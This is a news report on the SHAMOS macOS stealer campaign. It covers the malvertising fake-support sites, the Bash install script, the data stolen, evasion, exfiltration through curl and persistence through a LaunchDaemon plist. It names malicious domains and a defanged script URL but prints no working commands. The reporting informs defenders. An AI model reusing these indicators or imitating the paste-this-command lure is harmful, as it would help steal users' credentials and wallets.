macOS Users Under Threat: Malicious SHAMOS Malware Preying on False Support Websites to Siphon Login Details
A malware campaign targeting macOS users has been exposed, with over 300 customer environments compromised between June and August 2025. The malware in question, known as SHAMOS, is a variant of the Atomic macOS Stealer (AMOS).
The campaign began when users searched for common macOS troubleshooting solutions and encountered malvertising websites in their search results. These sites, such as mac-safer.com and rescue-mac.com, masqueraded as legitimate technical support resources but harbored malicious intent.
The malware, SHAMOS, is deployed through the download of a Bash script from https://icloudservers.com/gm/install[.]sh. This script captures the user's password and proceeds to steal sensitive data, including passwords, browser data, notes, and cryptocurrency wallets.
The malware's evasion techniques are sophisticated, designed to avoid detection. SHAMOS removes extended file attributes, assigns executable permissions, and conducts anti-virtual machine checks. It also uses fake Apple support websites that trick users into executing Terminal commands, some hidden in Base64, to silently install the malware.
The cybercriminal group behind SHAMOS is known as COOKIE SPIDER. They operate SHAMOS as a malware-as-a-service, employing a sophisticated social engineering approach. One Google Advertising profile promoting these spoofed websites impersonates a legitimate Australia-based electronics store, suggesting advanced identity spoofing techniques.
The instructions provided to victims contain a critical deception, initiating the malware installation process. Once installed, SHAMOS conducts comprehensive host reconnaissance and data collection using AppleScript commands. The stolen data is packaged into a ZIP archive named "out.zip" and exfiltrated using curl commands to remote servers.
SHAMOS also establishes persistence through a Plist file named com[.]finder[.]helper[.]plist saved to the User's LaunchDaemons directory when sudo privileges are available.
The attack was global, targeting users in multiple countries, excluding Russia.
CrowdStrike researchers have been investigating the campaign and are working to help affected users secure their systems. It is advised that macOS users exercise caution when downloading files from unknown sources and be wary of websites offering technical support. Always verify the authenticity of any downloads or websites before proceeding.
